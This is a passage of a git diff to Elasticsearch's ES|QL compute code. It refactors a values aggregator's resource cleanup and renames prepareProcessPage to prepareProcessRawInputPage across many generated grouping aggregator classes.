{ - append(builder, ids[i]); + builder.appendLong(getValue(ids[i])); } builder.endPositionEntry(); } @@ -249,9 +299,8 @@ Block buildOutputBlock(BlockFactory blockFactory, IntVector selected, int[] sele } } - private void append(LongBlock.Builder builder, int id) { - long value = values.getKey2(id); - builder.appendLong(value); + long getValue(int valueId) { + return values.getKey2(valueId); } @Override @@ -261,7 +310,7 @@ public void enableGroupIdTracking(SeenGroupIds seen) { @Override public void close() { - values.close(); + Releasables.closeExpectNoException(values, sortedForOrdinalMerging); } } } diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java index 4fce90e84add6..adb17dc433682 100644 --- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java +++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java @@ -56,7 +56,7 @@ public int intermediateBlockCount() { } @Override - public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds, + public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds, Page page) { BooleanBlock valuesBlock = page.getBlock(channels.get(0)); BooleanVector valuesVector = valuesBlock.asVector(); diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java 
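The Sorted structure introduced above is easiest to see outside the diff. Below is a minimal, standalone sketch (illustrative names only, not the Elasticsearch classes): the hash collects (group, value) pairs in insertion order, and buildSorted turns that into a CSR-like layout where counts[g] is the end offset of group g's slice in ids, so both output building and combineStates can walk one group's values as a contiguous slice.

import java.util.List;

/**
 * Standalone sketch of the counts/ids layout captured by the Sorted record.
 * Names and types here are illustrative, not the real compute classes.
 */
public class SortedSketch {
    record Entry(int group, long value) {}

    public static void main(String[] args) {
        // Entries in hash insertion order, groups interleaved.
        List<Entry> hash = List.of(
            new Entry(1, 10L), new Entry(0, 20L), new Entry(1, 30L), new Entry(0, 40L)
        );
        int maxGroupId = 1;

        // Pass 1: count entries per group, then prefix-sum into end offsets.
        int[] counts = new int[maxGroupId + 1];
        for (Entry e : hash) {
            counts[e.group()]++;
        }
        for (int g = 1; g < counts.length; g++) {
            counts[g] += counts[g - 1];
        }

        // Pass 2: scatter hash positions into ids, grouped by group id.
        // `starts` tracks the next free slot for each group's slice.
        int[] ids = new int[hash.size()];
        int[] starts = new int[counts.length];
        for (int g = 1; g < counts.length; g++) {
            starts[g] = counts[g - 1];
        }
        for (int pos = 0; pos < hash.size(); pos++) {
            ids[starts[hash.get(pos).group()]++] = pos;
        }

        // Read group 1's values as a contiguous slice, the way combineStates does.
        int group = 1;
        int start = group > 0 ? counts[group - 1] : 0;
        int end = counts[group];
        for (int i = start; i < end; i++) {
            System.out.println("group " + group + " -> " + hash.get(ids[i]).value()); // 10, 30
        }
    }
}

Caching the result in sortedForOrdinalMerging appears to be the point of the new field: combineStates is invoked once per output group, and rebuilding the layout on every call would rescan the whole hash each time instead of once.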
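The buildSorted refactor also changes who returns the reserved circuit-breaker memory. Previously the finally block always refunded it; now, on success, the refund moves into the Sorted's releasable and fires only when the caller closes it, while the finally block refunds only on the exception path where no Sorted was ever constructed. A toy model of that hand-off follows; adjustBreaker here is just a counter standing in for the BlockFactory call, and all names are illustrative.

import java.util.concurrent.atomic.AtomicLong;

/** Toy model of the ownership transfer in buildSorted(); not the real API. */
public class BreakerHandoff {
    static final AtomicLong breakerBytes = new AtomicLong();

    /** Stand-in for BlockFactory#adjustBreaker: positive reserves, negative refunds. */
    static void adjustBreaker(long delta) {
        breakerBytes.addAndGet(delta);
    }

    record Sorted(Runnable releasable, int[] counts, int[] ids) implements AutoCloseable {
        @Override
        public void close() {
            releasable.run();
        }
    }

    static Sorted buildSorted(int groups, int entries) {
        long countsSize = (long) groups * Integer.BYTES;
        long idsSize = (long) entries * Integer.BYTES;
        adjustBreaker(countsSize + idsSize); // reserve before allocating
        Sorted sorted = null;
        try {
            int[] counts = new int[groups];
            int[] ids = new int[entries];
            long total = countsSize + idsSize;
            // On success, the Sorted instance takes ownership of the refund.
            sorted = new Sorted(() -> adjustBreaker(-total), counts, ids);
            return sorted;
        } finally {
            if (sorted == null) {
                // Exception path: nothing took ownership, so refund here.
                adjustBreaker(-(countsSize + idsSize));
            }
        }
    }

    public static void main(String[] args) {
        try (Sorted s = buildSorted(4, 16)) {
            System.out.println("reserved bytes: " + breakerBytes.get()); // 80
        }
        System.out.println("after close: " + breakerBytes.get()); // 0
    }
}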
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java
index 4fce90e84add6..adb17dc433682 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBooleanGroupingAggregatorFunction.java
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java
index 2d005a17dd182..77c2085b80353 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctBytesRefGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java
index 0f0dfd4fa5b2c..5728e8051de9f 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctDoubleGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java
index 8e2fa1d71419a..a32c325b906de 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctFloatGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java
index 08768acfa5261..24e5176e41432 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctIntGroupingAggregatorFunction.java
@@ -60,7 +60,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java
index 0b1caa1c3727c..0685f1fc0fee8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/CountDistinctLongGroupingAggregatorFunction.java
@@ -61,7 +61,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java
index c0e299d57f6bb..4995a23d01140 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeDoubleGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java
index df4b6c843ff75..9e59f0145a3b1 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeFloatGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java
index d0252f8b420d0..eedfd0800fd49 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeIntGroupingAggregatorFunction.java
@@ -57,7 +57,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java
index 8506d1e8d527b..97e89e741f699 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/FirstOverTimeLongGroupingAggregatorFunction.java
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java
index 8a32e5552dd1c..313252268ca4f 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeDoubleGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java
index 250c5cd755a12..d6058e8e79189 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeFloatGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java
index 9b118c7dea9be..effbf31e5ed1d 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeIntGroupingAggregatorFunction.java
@@ -57,7 +57,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java
index 82bfc732969e5..a3b8fbbe8dc69 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/LastOverTimeLongGroupingAggregatorFunction.java
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java
index f7390f55bc52b..63b24da3e0e94 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBooleanGroupingAggregatorFunction.java
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BooleanBlock valuesBlock = page.getBlock(channels.get(0));
     BooleanVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java
index 41f98d962bd2f..d29b1cef6b8f8 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxBytesRefGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java
index 53273dad7c0f0..e140de51e801a 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxDoubleGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java
index 49afaf3c7265d..cc89041be61ba 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxFloatGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java
index 3d97bf9df5dd9..0c8e6dfe8e090 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIntGroupingAggregatorFunction.java
@@ -57,7 +57,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java
index fd38873655edd..4253fcbc1654d 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxIpGroupingAggregatorFunction.java
@@ -59,7 +59,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     BytesRefBlock valuesBlock = page.getBlock(channels.get(0));
     BytesRefVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java
index fcaea869f84d4..0c7d88e50755b 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MaxLongGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java
index c380146094f44..c8a9e737bd63a 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationDoubleGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     DoubleBlock valuesBlock = page.getBlock(channels.get(0));
     DoubleVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java
index a895ebc9eda6b..547f3c116a966 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationFloatGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     FloatBlock valuesBlock = page.getBlock(channels.get(0));
     FloatVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java
index f9b9934520f06..0d9433f12a379 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationIntGroupingAggregatorFunction.java
@@ -57,7 +57,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     IntBlock valuesBlock = page.getBlock(channels.get(0));
     IntVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java
index e1693d7475c6f..c14901d857379 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MedianAbsoluteDeviationLongGroupingAggregatorFunction.java
@@ -58,7 +58,7 @@ public int intermediateBlockCount() {
   }

   @Override
-  public GroupingAggregatorFunction.AddInput prepareProcessPage(SeenGroupIds seenGroupIds,
+  public GroupingAggregatorFunction.AddInput prepareProcessRawInputPage(SeenGroupIds seenGroupIds,
       Page page) {
     LongBlock valuesBlock = page.getBlock(channels.get(0));
     LongVector valuesVector = valuesBlock.asVector();
diff --git a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java
index 4ca346913a25b..145cf4412c88a 100644
--- a/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java
+++ b/x-pack/plugin/esql/compute/src/main/generated/org/elasticsearch/compute/aggregation/MinBooleanGroupingAggregatorFunction.java
@@ -56,7 +56,7 @@ public int intermediateBlockCount() {
   }

   @Override
